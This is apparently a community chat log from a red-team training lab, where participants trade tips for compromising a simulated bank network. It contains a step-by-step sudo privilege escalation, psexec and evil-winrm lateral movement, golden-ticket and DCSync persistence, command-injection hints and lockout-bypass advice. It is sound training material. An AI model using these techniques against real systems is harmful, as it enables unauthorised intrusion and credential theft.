I get local admin and then no idea 😁

@trim beacon I've got a bit of a technical issue with the last few objectives, that happened after a reset in the middle of a transaction- can I DM you please?

and yeah the cms dieing on the web sever has blocked shadow from trying that path so far

Yeah, @rocky python gave me a fix for it on stream which will be implemented before B2B. October does not respect its config when you disable account lockout. However, by now you should know what my favourite password is and it should not be too hard 😉

Did you reset your SWIFT progress and start again from flag 17?

It says I have an active check, so I try to remove the verification attempt with 'Z', then I get an invalid data error message. If I try to re-check 17 I get Invalid data, please try again
Expecting value: line 1 column 1 (char 0)

uh oh

Let me do a force reset, two seconds

also sneaky no hints option for none busniess users

There was no active attempt on your account. However I've removed flag 17 for you, so you can try to just continue from there

For my own check, just which subnet are you in?

119

Basically I was in the middle of trying last night, then the network got reset. When I got back to where I was just now, it thought I had an active SWIFT check going

Quickly check if you can do flag 17 now? Just want to see if it is fully flushed

On it

So... I have tried going from ROOTDC to BANKDC using psexec: cp PsExec64.exe \\bankdc.bank.thereserve.loc\C$\windows\temp\ Error message. Not gonna lie, it starts getting discouraging

Why are you trying to copy psexec to BANKDC? Just use PSexec on ROOTDC?

C:\Windows\system32>net user chris27
User name chris27
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2023/06/01 16:28:19
Password expires 2023/07/13 16:28:19
Password changeable 2023/06/02 16:28:19
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Remote Desktop Users
Global Group memberships *Enterprise Admins *Domain Admins
*Domain Users
The command completed successfully.

I'm not very smart. .\PsExec64.exe \\bankdc.bank.thereserve.loc -s cmd.exe?

hi why cant i remote into the root dc iv set up a account but no luck saying i am not able to remotely desktop any help pls

Do you have a connection from your machine? More precisely, I mean that e.g. from the VPN server (as proxy) you might not be able to connect to ROOTDC or BANK.

@trim beacon ok the verification for 17 worked - (sorry to whoever is fighting with me over RDP :p)

make your own accounts... unless that is not really possible with the swift transfers come to think of it

ah multi step download and upload to get files onto the DC

Finally had enough free time to finish this network, it was a very fun learning experience (all though frustrating at times 😂 )! @trim beacon thank you so much for this amazing network and giving us all this opportunity to give it a try before it is B2B exclusive!

Gave +1 Rep to @trim beacon

This is going to again be one of soap box speech messages that I type out once and pin.

We are currently seeing quite a number of users struggling with goal execution. We are also seeing some incredibly wild and noisy techniques being used here for goal execution. Users seem to be hell bent on using RDP for this when more stealthy and covert techniques exist. On a real engagement, good luck with the blue team when you start randomly kicking actual employees out of their active sessions.

As mentioned before, the two hardest parts of this challenge is the start, and the end. Goal execution is meant to be hard. It is meant to show you that there is an incredibly massive skill difference between "pwning the domain" and actually showing business impact on a red team engagement. This is why this challenge is not a CTF. It is not a boot-to-root challenge. It is meant to simulate what you might get out there in the real world.

With that being said, I'm more than happy for users to help each other here, but do understand that staff might not be providing more help for this portion. This is the point where you need to apply what you have learned to be able to execute on that goal.

A technical note: If the network resets in the middle of your progress between flag 17 - 20, you will have to start again from flag 17. Authenticate to e-citizen, press option 2, and then the option for reset flag progress.

What staff will help you with:

• Flag submissions for the goal execution phase if it gets bricked and does not reset
• Celebrations for finally getting to flag 20

Perfect, if flag 17 works and the network does not receive a reset, you should be good now all the way to the end

Awesome, thanks!

I think it is mentioned in one of the emails and also in the room wording, once you can see the SWIFT website, like actually browse to it, you should start the Verify SWIFT access flag, which is flag 17. By starting this flag, Trimento will create two SWIFT accounts for you

Glad you could get it done! Congrats! 🎉

Should work if your kerberos tickets are good

so by that logic you should probably not be kicked off rdp as you are using your own accounts

or well if you use your own accounts all the way basically

I think the problem is the deadline (just 4 days to go). Thus, people basically just kick in the front door to get the flags done. But I understand the point and still try to improve my path to SWIFT.

Windows has an RDP limit on all machines that don't have an RDP license installed. RDP licenses are incredibly expensive, so in real organisations these are only reserved for jump hosts. Normal hosts do not have RDP licenses, meaning the second a third user auth's to a machine, it will kick someone out. Even worse, on Win10, RDP, even as a different account, based on configuration will put the laptop in a locked state, meaning the employee using the laptop would immediately notice. This is why we wait until the dead of night and using keylogging techniques to verify that a user has logged off for the day before we would even think of opening an RDP session on a real engagement

aaah makes sense... shadow has not messed with this enough to know all the nuance yet

Honestly at this point the challenge is getting swatted to be honest. However, if you use stealth techniques, even if they kick the front door open, it will not affect your journey. For example, if you were to use a combination of SSH and WMI, you can do this entire challenge without opening RDP once

wmi as in evil winrm????

because shadow had trouble figuring out how to create the files with the right encoding for the flags on there

This is interesting. ||So far, I got to ROOTDC without RDP (and got the ROOT\administrator hash) but I think at this point one needs a new proxy. My hope was, that I could work my way to BANKDC by DC sync'ing and pass-the-hash (from CORPDC proxy). Only think I doubt that I can manage the SWIFT transaction without RDP||

I avoided some of the RDP inception, but I don't know how one would complete the goal itself without it...

will we get to see some writeups before the network transitions to b2b?

Can I interest you in my religion called reverse dynamic SSH proxies? 🙂

Which might I add, is covered incredibly well by our very own @tall sorrel in his network: https://tryhackme.com/room/lateralmovementandpivoting - Which is part of the Red Team learning pathway 🙂

Trust me, 100% possible without opening a single RDP window 🙂

U could use powershell
echo "string" | Set-Content file.txt

The top three reports will be converted into writeup blog posts that will be published on our website

oh I'm sure, it's just that I personally don't know how

Either use command prompt instead of powershell or use what @serene sedge sent

I will give it a try. I was honestly surprised to see that ssh is available on Windows 🙂

ah thanks @serene sedge

Gave +1 Rep to @serene sedge

Welcome to the modern age. Now comes standard with Windows Servers

No clue why Windows thought it would be a good idea though 😂

well shadow is probably gonna complete it using the stupid path of using rdp

because not feeling up to figuring out all the stuff needed to do it rdp less

Go for it! Good luck in the RDP force logout arena!

https://giphy.com/gifs/tZCkL6BsL2AAo

thanks gonna keep trying

so far there seems to have only been a single other user on this subnet that has grabbed flags from the corpdc

anyone had issues when authenticating to the e-citizen seems my password doesn't work anymore

Windows does Windows.

Complete! Thanks @trim beacon for an awesome experience

Gave +1 Rep to @trim beacon

not problem authenticating but it was dead slow yesterday for shadow

it took over 3 mins to get logged in with the creds

it's like that for like 2hours now

Congrats! 🎉

and rootdc pwned enough to get the flags

Make sure to do some form of persistence so you don't have to follow that exploit path again. Simplest would be to DC Sync the root domain. That way even if the network resets you can jump directly back into that position

??? goobly gook shadow not undestand most of that message ???

Have you dumped the credentials from CORPDC using something like mimikatz or secretsdump?

yeah

first secretsdump... used mimikatz to do a golden ticket for access to files and folders on rootdc

So now even if the network resets, you still have the NTLM hash for the Administrator@corp.thereserve.loc account right?

used evil winrm to get into corpdc and add a new domain admin user

yuups

assuming it does not change

which shadow dunno if it would but hope it does not ¯_(ツ)_/¯

Okay, now you have gotten access to the root domain, thereserve.loc. Why not dump credentials from this domain so you don't have to do the golden ticket attack again?

If you dump the hash for Administrstor@thereserve.loc, you will never have to do these steps again, can directly start there next time the network resets

ah

This is called persistence techniques. Meaning even if the blue team kicks you out (or the network resets) you have another way in

dunno how to do that considering shadows way of access to root dc is using the golden ticket and powershell but probably explained in tyler R:s vod hopefully

considering he also had to deal with network resets

You're golden ticket is on Corpdc right? Just run mimikatz in the window that you have created the golden ticket and tell it to dump credentials from thereserve.loc instead of Corp.thereserve.loc

yuups golden ticket on corpdc .... time to look up mimikatz syntax

;-; why is it so hard to find stuff sometimes

almost feeling like asking for the mimikatz command here because shadow is so bad with mimikatz

meep it time to keep watching tyler to see him do it

Check the AD persistence network room. Check persistence through credentials. Syntax is given there

thanks am03bam

thought it was in one of those network rooms but did not know which

hmm errors

Why cant I join the network? It just redirects me to room page that says you need 7 day streak, but I am a subscriber...

You still need the streak nonetheless

alright thanks for the info

a 7 day streak and sub is required

I’m about to get my 90 day streak yeeee haw

oh boy..... I finally made it ! That was a thing ! many many many thanks to @trim beacon That was was a really great challenge! So wide, so wild! so many many ways to explore! many thanks to @trim beacon, for this challenge and his experience sharing ❤️ This is really a thing

Gave +1 Rep to @trim beacon

I hate to sound dumb but how do you give rep on discord . I’m older than dirt and don’t know my way around social media

@quaint knot second part of stream number 7 seems to be missing with ciritical info on how you got access into rootdc... is the fottage lost or do you have it saved???

That wasn’t on there

O got a work around though

someone pings you or quotes you with a mesage that includes the word thanks or thank you or ty or +rep

Gave +1 Rep to @thin dome

Cool

@cerulean wraith I just sent you a dm. Can help with rootdc

not really as some critical data seems to be lost from the guide shadow used

It’s not lost , just had to figure it out by myself because it’s not on where you are looking

lost because the video by tyler is missing a huge chunk not lost that it is impossible to do

It’s not on Tyler’s Vid. The part you are looking for

*?????

now you are confussing hsadow

oooh you did not need help but offered help

with the golden ticket you can do everything. upload implants/dll, start/stop/create services etc.

well does not look like it ¯_(ツ)_/¯

I DMd you

yeah just checked it hornruna

Guys, am I the only one experiencing issues to connect?

Feels like it worked a couple of minutes and now the servers are not responding

for example even the vpn login page does not give me any feedback on submit anymore

• vote reset 🙂

so sad i'll not make it until end of availability as it looks like :

:\

+rep @thin dome

Gave +1 Rep to @thin dome

and there we go... the first time the network reset on shadow causing them to get kicked out

meeping moops

Does it refer to my issue not getting feedback from servers? like vpn one hanging in submit?

1st time only? consider yourself very fortunate!

last nights already have been too short 😬 I'll take a nap.
When will the time end to be able to finish the capstone challenge?

hopefully another 12h 😉

played subnet roulette a lot to find the few working and not to competitive subnets

Says it’s 3 days and 13 hours right now

Try another subnet , press leave the room and then look it up again and join again . Find one that works

And, after a reset , it takes a little to get back up and running . I had that issue once but I waited and it started working again

yeah

shadow has a decent written quick guide to get back into corpdc

Y’all can make it

I’ll help however I can

yuup

just gotta sleep between this last attempt and the next

I didn’t sleep hardly at all lol . I was so obsessed with getting it cause I had already started it . Felt like I bit off more than I could chew but once I start something I like to finish. It really was an eye opener for me and helped understand things better .

yeah true

shadow just knows there are limits to their attention and provess in hacking if they keep going for to long

well could be because shadow did not stay to long and just did step by step quickly to get some new flags quickly

DONE. great challenge @trim beacon !

nice good job mousse

Thank you 🥹

Gave +1 Rep to @cerulean wraith

you beat shadow too

Thanks for the hint here, I got in 🙂

Gave +1 Rep to @trim beacon

I still cant get the rep thing figured out. Im a fuckin looser

Now Ive been stuck on this for 30 minutes

when you reply to someone like this and your message contains the words "thank you" or "thanks" or "ty", or tagging then with "+rep" is how it works

Thanks . Ill try it but doesnt mean Ill get it. Sometimes I overhtink think things and end up in the weeds, hence why it took so long to do the challenge

Gave +1 Rep to @slender verge

Looks Like I just did it through robocop

there you go!

thanks @slender verge

didnt work that time. I guess there is a timeout

it is limited to once every 5 mins

i.e you can't give out thanks to multiple people unless you wait 5 mins

so yeah timeout

thanks @cerulean wraith

yeah. didnt work

guess ill get back on scylla and blackbird.py. trying to get an old friends phone number. Its fun to play around with OSINT tools

Finally got persistence on ROOTDC. I used my firewall hole-punching and portproxy trick to point the first DC to the ROOTDC. I had to combine it with a AMSI bypass + Disable AV + Add User

Let’s see where that goes

Good job

Do you want me to give a example as a tip?

got to last flag and network reset is there a way to get back to where i was or do i have to do it all again

you have to get flags 17-20 in one go so you'd have to reset your progress on that

No

The last 20 flags are all on bank.Corp

My bad

The last 4 flags are all on bank.corp

I don’t know where you are so I don’t know what you mean . Once you get to bank.Corp you got access to flags 9-20

Like @slender verge said , for the last 4 flags , you gotta have a one shot cause if it gets reset then you gotta start over on the progress for the last 4 flags

Damn. Network is about to reset :(. I'm gonna work on my classes

At this point you should have enough information to be back at BANKDC in no time

nvm, silly me. I was trying to ping under proxychains

Still here if someone needs some help

Congrats on completing it! 🎉

Congrats on completing it! 🎉

Thank you! That was awesome

Gave +1 Rep to @trim beacon

i think it's depend on the pivoting method and metasploit been working fine for me so far but on the root and bank domain it is getting more unstable by second (for me) so i change it to chisel and it's a bit slower it's much more stable and everything from burp to evil-winrm been working fine for me

also sorry for the late response

I just can't figure out how to use proxychains correctly.. it has always worked for me but now just doesn't:
i breached one of the 'outer' hosts and have ssh access to it as root, so i ssh -D 9050 root@hostname
then i would update my /etc/proxychains.conf with socks4 127.0.0.1 9050
and do proxychains nmap target -Pn etc.
but it seems like it doesn't use proxychains at all, since i don't have that line where proxychains shows me the forwarding through the tunnel [proxychains] Strict chain ... 127.0.0.1:90590 ... target:port ... Ok
i also don't get an error from proxychains, it just seems like traffic is routed through my "own" routes.
do i have to remove the route to 10.200.X.0/24 from my routing table to force traffic through proxychains? I thought this would be enforced with strict_chainin proxychains.conf already?

tested on the THM AttackBox with proxychains 3.1

i 100% can't get the proxychains on both thm machine to work for me, so i would recommend that you use your machine and i always use proxychains4 with the quiet tag so no idea about the verbose thing and in the config file you should use socks5 not 4 and comment out the strict_chain + use dynamic_chain (the last one i don't think matter)

alright, will test that, thanks a lot!

Gave +1 Rep to @dreamy comet

Thank you, no idea why cmd and notepad not working

Gave +1 Rep to @dull kestrel

If using evil winrm it defaults to Powershell

Use the -sT flag. -Pn might be lying to you

from this line [proxychains] Strict chain ... 127.0.0.1:90590 ... target:port ... Ok It seems you have a typo? It should be 127.0.0.1:9050. And I personally use the socks5. I didn't use the -Pn default nmap works fine.

thanks @trim beacon and @lucid bay , as @dreamy comet pointed ot the problem are the THM boxes (AttackBox as well as Kali). proxychains just doesn't work correctly on those. Used my own one and bÄm, works as intended

Gave +1 Rep to @trim beacon

y u no giev Baturu thx?!?!

Cheers mate, glad you sorted it out

I'll do it! Thanks Baturu for being helpful 🙂

Gave +1 Rep to @lucid bay

Bot only counts rep once per message 😅

are your vpn working?

i can't access the network

hi @hidden galleon could i dm you or any staff? the e-Citizen portal seem to be broken on flag 19 for me

resetting 121 now, really? just golden ticketed my way to dc...

i mean if you do it on linux you can keep using can ticket even after a reset

yep sure but the initial access has to be done again, which is ok tho, i need a break anyway

If a network reset happened between you getting flags 17 - 20, you will have to reset your SWIFT progress (Authenticate to e-citizen, press option 2, then reset SWIFT progress). Then start again from flag 17

You have to get these flags in a single go

so thats why i CANT GET IN

so that apply to the Invalid data, please try again Expecting value: line 1 column 1 (char 0) error?

Most likely yes

so after the reset do i need to get all of the flag from 1 to 19? or will i start at the 17 flag?

also option 3 Reset SWIFT progress right? my brain is frieded and i really don't want to re-do 19 flag

@trim beacon 🤣

Jsut from flag 17

yea same error

That is fine, it does a full flush. So now try to get flag 17

beside the 10x Permanently added everything seem to be working fine and in the get flag part of this it still show true for flag 17 and 18 so i just assumed the reset didn't work because of the error

am on flag 18 again and am not receiving the Transaction in my capturer access account

Give it a go. It if gives an issue still, I'll do a full reset from my side

Did you refresh the page? If e-citizen says it has been created, it will be there

will try thanks

there is still nothing coming through

Best to use an incognito browser to flush all cookies

ok thanks its working now

I'm quite confident the hashes don't change, yet before I was able to use both psexec and evil-winrm to log into corpdc and now neither of those are working

someone might have changed the hashes?

also, keep in mind if the password expired you can't use the hash anymore :/

huh, does the password expire on this network

thank you, you were right, hash is different now

Gave +1 Rep to @normal spire

yeah some of the machines have expired Administrator hashes

you can check with net user <user> under password expiry

The AD Administrator hash is one that cannot expire, even if it shows an expiry time. This account is used to recover AD when all else fails, thus this account bypassed expiry rules

sigh now the meeping vpn host is lagging again

when passing the hash with evil-winrm is it the nt part or the lm part or the whole ntlm???

in that case someone changed the password?

darn unstable internet connections is horrible during this

More than likely. But there are t0 accounts as well you can use to at least get you back to CORPDC. Would be very unlikely that someone changed all passwords for all accounts

Should be the nt part IIRC

thanks... that should probably mean shadow could get a evil-winrm shell on rootdc then

Gave +1 Rep to @trim beacon

ah sorry i meant more of the wrk and server hosts

careful because would need another pivot to access rootdc from your attackbox unless you're attacking from corpdc

unless it was just being dumb or something

Yeah those def can expire!

they expired in like march haha

Yeah I think that is when they were migrated to AD, which means no longer in use

really??? think shadows pivot point has access to rootdc but not 100% sure

yo @trim beacon different issue now, after i login to the destination account and transfer some funds to the source account i think i should get a pin in my mailbox but i didn't (this is the second time i have reset and try this)

Finally completed the challenge bin mad at it since it went live got to last flag last night the network reset done it today in less then a few hours. Iv learned why note taking is so important Iv learnt a lot in a sort time great room and many thanks to the people that don’t no they helped me out and to the people that do thanks a bunch happy cracking

iirc only corpdc can access rootdc

okay then.... guess that won't work as easily for shadow then

i just psexec’d from corpdc

also internet keeps cutting out and back in all the time right now....

but like from corpdc not from my attack box

can't keep hacking if internet goes poof every 1-5 mins

Your pin is sent in the verification email for flag 17

same pin? but that one give me an network error when used?

That pin should be active, but if not give me your subnet and I'll pull the pin for you

Congrats on completing it!

sure my subnet is .103.

Give me two seconds

3777 is the one on record

Wait no, 6425

Read one of the dummy transactions

But why does your account have two transactions? I think you might have done something wrong for verification. There you only be one transaction, I can see two. One for 10 mil, one for $2

Try to verify the transaction and hopefully verification works, but there should only be one transactoins

oh jesus christ i have to confirm the 10 mil one, my brain is completely dead so the instructions is confusing to say the least

Did you get it confirmed?

yes but still

i think this is because the 2 transaction i make (also did flip the account still same error)

Might want to read those boxes carefully, what are they asking for?

yeah i have brain damage

and shadow has massive fomo because their internet is being whacky and annoying right now

So while we are on the last days of the challenge being for subscribers, will share that I am sad that no one seems to have found the non-malicious way of getting root on VPN. (Will delete again when it goes B2B)

If you look at the sudo -l output, you actually have two things you can run as sudo without a passwd:

• /home/ubuntu/openvpn-createuser.sh
• /bin/cp

A quick ls -al /home/ubuntu/ will show you the openvpn-createuser.sh file.

So to privesc, you simply

1. cp /home/ubuntu/openvpn-createuser.sh /tmp/openvpn-createuser.sh
2. Create a backup of the file so you can replace it when done
3. Rewrite the file to simply run /bin/bash
4. sudo /bin/cp /tmp/openvpn-createuser.sh /home/ubuntu/openvpn-createuser.sh
5. sudo /home/ubuntu/openvpn-createuser.sh

And you are root, once you neatly deploy your persistence, you just replace the openvpn-createuser.sh with the backup you stored and no harm done to the box.

What makes me sad is, that doing it this way means you take into context why this misconfiguration took place. Essentially, in order for the web server to generate and transfer user VPN profiles, an admin gave those two permissions. If the admin just actually took the time to update the openvpn-createuser.sh file to already copy the VPN file, this privilege escalation vector would not be possible.

So while tools like GTFObins can help you privesc, sometimes just thinking about the context of the misconfiguration can help you not only understand what happened (which means you can provide better recommendations to the client), but also privesc is a much safer way.

And which machine is this on. 😛

Literally said the machine name in the first sentence 😂

I know.

I'm winding you up. 😄

Honestly, all that went through my head was these damn users don't read nothin' 😂 Good wind up

I knew it would,

It reminded me of our conversation where you said it's going slow to us savages who don't read, will

E-Citizen, that is.

Yep, and even then we still increased the speed of the text of e-citizen cause users got frustrated. Just can't win here! But overall overexceeded my expectations of the number of users who would complete the challenge. Currently standing at 117

Luv it! must admit I only saw the /bin/cp only. Now I gotta go back to to see it for myself! I still like your MSF tactic to root better, but see how this one is much more helpful (for the customer). But what advantage am I missing being root on VPN anyway? Other than PoC and trolling others? It doesnt seem to prevent you from getting to .52 with just ubuntu user as a base. Genuinely curious!

sooo just copying the contents of the .ssh/authorized_keys and then adding your own and adding back all the old ones is not a good exploit path for root on VPN????

It is the main fact that you don't have a really clean way of connecting to the host as www-data. Like you can't really drop an SSH key for example for this user. Other than that, no need to actually get root, which is why there is no flag for it

I'm not saying it is a bad path, all I'm saying is that it doesn't take into context why this misconfiguration happened

ah fair enoughs

yeah as a tester doing right by the customer is the ultimate goal!

shadow just liked having a stable ssh connection for root/sudo access as it seems safer

More than that, I can promise you as the client I would be getting reports telling me to remove /bin/cp from the list. Which sure, you are not wrong, but that doesn't help me as the client right? Cause I need it? But understanding why I made the misconfiguration, you can tell me to update the .sh script to already copy the file for me to the right location, thereby eliminating the need for the misconfigured privilege to exist

Did anyone get the ||GPO misuse from Server2 to CORP?||

Indeed yes, think I actually even got a writeup for this path which was super cool! They used an awesome tool for it!

neat... gonna have a field day with reading all the write ups if we get access to them

Nice! I was wondering about that one, glad that was found

Busy grading them now. The top three ones will be published as blog posts

It's an exciting weekend for THM.

Hopefully just an exciting Friday evening, I got other stuff to worry about this weekend 😂 Have about three writeups left to QA

when this challenge expires?

on monday

monday 23:59?

in 2 days and 17 hours

Thanks

first task of the network has a countdown timer that you can check

it does not state the time zone for when access expires though

Won't matter.

The timer will count down.

I'd suspect it's 12PM Monday UK time.

12PM BST is correct!

thanks @hidden galleon

Gave +1 Rep to @hidden galleon

anyone can help me with pivoting

meterpreter and chisel

both are not working

What's not working exactly?

Like which command are you running that doesn't work

every cmd like nmap remina nslookup

i dont know what i am doinf wrong

For nmap you need the -sT flag

If that doesn't work I recommend giving as much detail as you can so we can help debug

okay i know what was problem

What was it?

i am stupid

thx @slender verge

Gave +1 Rep to @slender verge

You're welcome

would you even say that corvids are smarter then you???

Finally, Thank you @trim beacon for such an amazing challange. Loved it!!

Gave +1 Rep to @trim beacon

nice a person that is not using rdp

Is anyone on the .119 network? everything was fine until 10 minutes ago and now it seems like nothing is reachable including web/vpn

Yes, I am having the same problem. All hosts are unreachable

hit reset

or play subnet roulette

You mean leave room and re-join?

yuup to get a new subnet to try and hack

it is like a roulette wheel spin and that is why shadow is calling it that

Thank you.

Gave +1 Rep to @cerulean wraith

Thank you @trim beacon it really was an incredible network!

Gave +1 Rep to @trim beacon

congrats, is that color 27? How did you get the green so dark XD

I tried hard to do it the no-RDP way, but I don't have the knowledge for that yet

is it fair to say if you brute force the admin password successfully with Burp on the October page and it wont log you in (page just flashes and redirects to logon page again) that site is broken? I'm kinda getting used to all the brokeness but wonder how on earth this bank gets any business done??

I would guess so, you should be able to log in just fine

and the plot thickens.... must be a timeout (600 sec?) when too many login attempts

oh yeah, currently it times out after like 5 attemps and locks you out for 15 minutes

if you've got the password, set a timer and try to log in in 15 min

900 sec then- --so you're saying there's a chance? 🥁

I'm saying there's a chance 😁

well this admin is going in my report for password policy violation - I hope I don't have to explain impact any further than a screenshot of me loggin in

technically not a violation of the policy 😁 it doesn't want at least one capital letter

touche! its a poor password policy -sorry admin

it really is

unless the admin setup the policy?? seeing how broken this bank is, anything is possible. Nothing like 600+ Red Teamers poking around it all at once... what could go wrong??

In their defense, I have seen in real assessment where the password check is only on the client-side. I could literally capture the password change request with BurpSuite and set the password to "t" and it has worked more times than you'd believe 😂

oh wow! scary thats a real thing in 2023. also recommend along with just suspending account for 15min, rate-limit the attack (time-out) so Turbo cant continue bruteforcing after the 5th attempt - that would make any attacker cry

15 min up and I'm in!

So another interesting thing you're experience, which can happen in the real world, is when an account is locked due to invalid login attempts, you can essentially DoS an account by setting a script that continually logs into it. There's not really a way around that -- you could do an IP Block but BurpSuite has an extension (developed by my company - Rhino Security Labs) - called IP Rotate which will rotate your IP through AWS gateways that are spun up so you can bypass IP Blocks.

That being said, for one assessment for a security company, I could DoS the account by locking the account which would be great if I was attacking the org. They would not be able to log into their SIEM software to prevent the attack, because I could set a script that continually attempts to log into the account, therefore locking them out of their security platform!

(Enforcing a CAPTCHA after 5 or so invalid login attempts is a really good security measure -- as long as the CAPTCHA is securely implemented. Once again, I've seen CAPTCHAs that show up, but literally aren't enforced. You can keep bruteforcing and just pretend the CAPTCHA isn't there!)

Congrats on completing it! Love the powershell sessions you got there! Pivots to the extreme!

Congrats on completing it!

Account lockout kicking your butt here 😅

it had me for 15min, yes! lol

Glad you got it sorted!

just wanna say thanks a lot to @broken nest for helping me debug my ticket and also a big thanks to @trim beacon for making this awesome lab, i finally finish the damn thing and i have severe brain damage https://tryhackme.com/mr.tom/badges/redteamcapstone

Gave +1 Rep to @broken nest

Hello, after connecting to vpn , I’m getting 172. X.x.x network instead of 10.200.x.x…Can anyone advise what needs to be done

The "ovpn file way" is not stable as hell. I have it fixed eventually. But for root the DC, I need to do all the other way.
To sum up, it's not worth at all to fix it.

Just root the VPNServer and start from there. You won't lose any progress you made so far. It's faster and more stable

Thanks @lucid bay …let me see if it works

Gave +1 Rep to @lucid bay

Congrats for completing it!

Hi i add the issue several times and used this help: #red-team-capstone-challenge message:
"Hello, yesterday I had issues connecting to the internal network so I did: sudo ip route add 10.200.116.21 dev tun0
sudo ip route add 10.200.116.22 dev tun0"

The network is broken?

@dire folio Hi there, is there anyone also facing connection issue?

Hi ya, I just started the room and have enumerated all the machines I can reach to, but haven't got much interesting stuff

could anyone give me a hand ?

I am having trouble getting a reverse shell , on 10.200.116.12 shows connection failed trying to connect to 10.0.2.15, which I am not using. Any ideas would be much apreciated.

Timsu, have you been able to get access to any machine?

Timsu, have you been able to get access to any machine?

I was able to access initial machines and 10.200.117.21 yesterday

But after the reset, it turns into 172.x.x.21 instead and not able to access it anymore

I think it was supposed to close today and only be available to business users.

if you are using the vpn config files and it gives you 172 you will have to manually add the correct routes

nope it closes on the 5th

Oh yeah, I thought It was the 6th today

nah we only on the 3rd

There's a countdown timer in the first task

I played with RGB codes a little bit.

The "G" in RGB is 161, change it to "100" and you will get this green.

A friend is doing this and I’ve heard nothing but complaints from them on people resetting the lab every half an hour. Like no kidding. They are having a good time on this but seriously?! Why are people resetting so often 😦

I can see this being so frustrating

somehow shadow only got reset nuked once

but yeah that nuke came right when shadow was about to do the final major pivots so it hurt a lot

A lot of it is, “step is not working, time to reset” instead of proper debugging or trying another path

Hey everyone, seeking help. I stuck on the ROOTDC. I'm on a psexec shell. Can't run mimikatz since there is AV and couldn't create a new user.

Tell them to get on a different subnet, might help with some luck

Finally, get a new user with full privilege on ROOTDC. But the ROOTDC and BANKDC are all rdp closed. It that right or network issue?

PORT     STATE  SERVICE       REASON
3389/tcp closed ms-wbt-server conn-refused

Must be a network issue, should be able to RDP onto them just fine

Thank you, wasting hours to do those

Gave +1 Rep to @slender verge

I'm having trouble authenticating on the vpn panel (10.200.x.12) with the email laura.wood@corp.thereserve.loc and password Password1@. Has anyone had this problem?

Anyone willing to give me a hint on why do I can perform command injection with ping in the vpn server and I cant use a wget or a curl?

&& & ; | try fuzz those chars before your injection command. And command injection lead to RCE, you won't need wget or curl

Maybe I'm wrong. The network restarted.

3389 seems opened to the internal servers, like I can telnet inside the DC. But won't open through VPN which outside of the firewall

where are you trying to reach it from? vpn server?

Yeah, I was initially tried to reach ROOTDC 3389 from the VPNServer

oh I understand now, that's not going to work, you have to be on CORPDC for that

from there you can get to both ROOTDC and BANKDC

true, Thanks. I'm lazy to do another pivoting. I'll just use the CORPDC rdp session to do those tho

unless somewhere blocked me

yeah, that should work just fine

hii . i found valid email and password but unable to login ,

Maybe they login elsewhere.

There is one guy patched the DCSync of CORPDC to stop other users get in?

proxychains impacket-secretsdump corp.thereserve.loc/svcBackups:'q9xxxx'@$IP
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1085  ...  10.200.x.102:445  ...  OK
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up... 

I hope they stop messing up with other players. It's very fast to get 4 votes already

Hey can anyone help me i am unable to RDP into wrk1

yeah. i use these cred in other site. yesterday they worked perfectly now it's not working

YES i am not able to get shell back to corpdc

network reset crashed it all

/timeout:60000 fix

any help on connecting corpdc

i had a evil-winrm connection

but after network reset not able to connect

probaly password hash is changed

if you have evil-winrm connection and can't rdp, try reset password to get in.

if you lost evil-winrm connection, try do exactly what you got the NTLM hash in the first place again.

If none of them worked, vote for reset, and leave the room wait 1-2 minutes and rejoin another subnet.

I'm so stuck after getting PsExec shell on ROOTDC. Should I just stop working on ROOTDC? Just attack BANKDC directly from CORPDC?

Nothing work for ROOTDC, DCsync attack for admin hash, neither creating a new AD domain user

Anyone mind quickly helping me to get an enterprise admin setup, got my golden ticket on rootdc

I have a misc::cmd Psexec shell after the golden ticket. But completely stuck there for a whole day.

right now same here

struck on rootdc

Found a cheeky exploit. If still struggling dm me

@trim beacon I'll tell ya what. This is one damn good network

Whoever just booted me off corpdc on .119, WHY

@trim beacon new challenge:

RDP Fight on .119 for CORPDC

did you get to bank dc

Indeed, Im making the SWIFT

mind telling me

[12:42:55:293] [4106:4111] [INFO][com.freerdp.core] - ERRINFO_DISCONNECTED_BY_OTHER_CONNECTION (0x00000005):Another user connected to the server, forcing the disconnection of the current connection.

Sure am happy to help when I finally get access restored.

you settled the fight

@trim beacon GG Well Played.

anyone got to bank dc after root

Change password for administrator with psexec from golden ticket attack.... net user Administrator newpassword then rdp with thereserve/Administrator and new password.

I'm so glad i spent all day and night Saturday for the network challenge and was alone for hours in the subnet. hehe

i think it is not working

i have tried the invoke smbexec way too

but it is showing worong creds

i think i have extracted wrong hash value for administrator

If you have a golden ticket there is another way.

which way

@hexed whale

Whats one tool that is installed on ALL active directory gui servers?

(By Microsoft ^)

rdp

I told you the way above

Not that one. Its under ADMINISTRATIVE Tools in start menu 😉

https://tenor.com/view/yoda-there-is-another-star-wars-jedi-gif-5140031

There is 6000 ways

for rdp one

i have replicated your way too but it is showing wrong cred

@gleaming bough once i got onto rootdc with golden ticket. (Shell with PsExec.exe)... changed the administrator password for ROOTDC, then rdp into ROOTDC with the new creds.. created a domain admin user for BankDC. Rdp into BankDC.

can i dm you

To correctly rdp into rootdc use thereserve\Administrator

Yes sure

Finally did it. Great network

Thank you for creating such a wonderful network 🙂

@trim beacon Thank you

Gave +1 Rep to @trim beacon

https://assets.tryhackme.com/room-badges/9d8415815853b369d24f62fea5809747.png 🎉

Thank you for the challenge @trim beacon . Already compromised the network several days ago, but the path to compromise bank domain is unintended since it cannot be replicated after the network reset ^_^. However, today i know the path to the bank domain via the intended path after several trial and error

Gave +1 Rep to @trim beacon

Wow its finally completed @trim beacon thanks for this tough challenge

Gave +1 Rep to @trim beacon

https://assets.tryhackme.com/room-badges/2ce50b855dc156d926c2809cd95cc92c.png

Really guys, I'm having a hard time enjoying this since I stopped working on the lab yesterday because the VPN server was not responding and now when I get back someone changed the configuration on the VPN server and the VPN file is not downloaded anymore and the OS injection can't be exploited...

vote for network reset

